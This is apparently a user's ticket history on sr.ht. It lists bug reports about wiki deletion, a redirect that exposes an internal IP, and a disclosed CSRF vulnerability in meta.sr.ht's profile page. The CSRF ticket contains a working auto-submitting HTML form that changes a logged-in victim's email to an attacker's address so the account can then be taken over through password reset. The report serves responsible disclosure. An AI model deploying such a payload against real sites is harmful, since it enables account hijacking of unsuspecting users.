~alxjsn


#47 Wiki deletion issue when underlying repo is deleted 4 years ago

Ticket created by ~alxjsn on ~sircmpwn/man.sr.ht

If I create a wiki and delete the underlying repo I cannot delete the wiki anymore. The workaround for now was to go and create that repo again and then delete the wiki.

#46 Improve UI for deleting a wiki 4 years ago

Ticket created by ~alxjsn on ~sircmpwn/man.sr.ht

If I create a new wiki, but don't push an index.md it isn't very clear from the UI how I would be able to delete the wiki. I found that I can go to https://man.sr.ht/manage/~username/fakewiki/info to find the delete button. Can the UI be improved to show this?

#18 Incorrect redirect URL 6 years ago

Ticket created by ~alxjsn on ~sircmpwn/man.sr.ht

This is a minor issue since it doesn't break anything in most cases. When there are redirects, the URL in the body is incorrect and instead shows the internal IP address/port.

Request: https://man.sr.ht/dispatch.sr.ht

Response:

HTTP/1.1 302 FOUND
Server: nginx/1.14.0
Date: Fri, 16 Nov 2018 19:29:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 281
Location: https://man.sr.ht/dispatch.sr.ht/
Connection: close
Set-Cookie: history="[\"man.sr.ht\"\054 \"meta.sr.ht\"\054 \"builds.sr.ht\"\054 \"git.sr.ht\"\054 \"todo.sr.ht\"\054 \"lists.sr.ht\"\054 \"dispatch.sr.ht\"]"; Domain=.sr.ht; Path=/
X-GNU: Terry Pratchett

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="http://127.0.0.1:5004/dispatch.sr.ht/">http://127.0.0.1:5004/dispatch.sr.ht/</a>.  If not click the link.

#69 Security: Vulnerable to Cross-site Request Forgery (CSRF) 6 years ago

Comment by ~alxjsn on ~sircmpwn/meta.sr.ht

Sorry about that. Feel free to remove this ticket then.

#69 Security: Vulnerable to Cross-site Request Forgery (CSRF) 6 years ago

Ticket created by ~alxjsn on ~sircmpwn/meta.sr.ht

The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.

 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://meta.sr.ht/profile" method="POST">
      <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="bio" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Once a user that is logged in visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but will apply to any state changing request.

Feel free to ping me if you have any other questions.

Resources: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet